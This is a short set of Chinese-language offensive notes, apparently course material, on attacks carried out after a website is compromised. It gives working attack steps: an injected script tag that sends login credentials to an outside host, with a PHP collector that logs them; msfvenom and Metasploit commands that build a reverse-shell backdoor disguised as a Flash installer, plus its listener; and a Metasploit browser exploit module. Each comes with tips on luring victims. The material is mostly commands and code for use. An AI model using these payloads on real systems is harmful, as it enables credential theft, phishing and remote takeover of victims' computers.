#XSS-后台植入Cookie&表单劫持
-条件:已取得相关web权限后
1、写入代码到登录成功文件,利用beef或xss平台实时监控Cookie等凭据实现权限维持
2、若存在同源策略或防护情况下,Cookie获取失败可采用表单劫持或数据明文传输实现
将账户密码发到某个地方
$变量=<script src="http://www.xiaodi8.com/get.php?user=账户&pass=密码"></script>
echo $变量//因为是php,没办法直接执行js,所以需要这样操作。
<?php
$a=$_GET['user'];
$b=$_GET['pass']
$myfile=fopen("newfile.txt","w");//创建一个txt,
fwrite($myfile,$A);写入数据
fwrite($myfile,"I")
fwrite($myfile,$b)
fclose($myfile)
?>
#XSS-Flash钓鱼配合MSF捆绑上线
-条件:beef上线受控后或直接钓鱼(受害者爱看SESE)
1、生成后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=6666 -f exe > flash.exe
2、下载官方文件-保证安装正常
3、压缩捆绑文件-解压提取运行
4、MSF配置监听状态
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6666
run
5、诱使受害者访问URL-语言要适当
#XSS-浏览器网马配合MSF访问上线
-条件:beef上线受控后或直接钓鱼(浏览器存在0day)
1、配置MSF生成URL
use exploit/windows/browser/ms14_064_ole_code_execution
set allowpowershellprompt true
set target 1
run
2、诱使受害者访问URL-语言要适当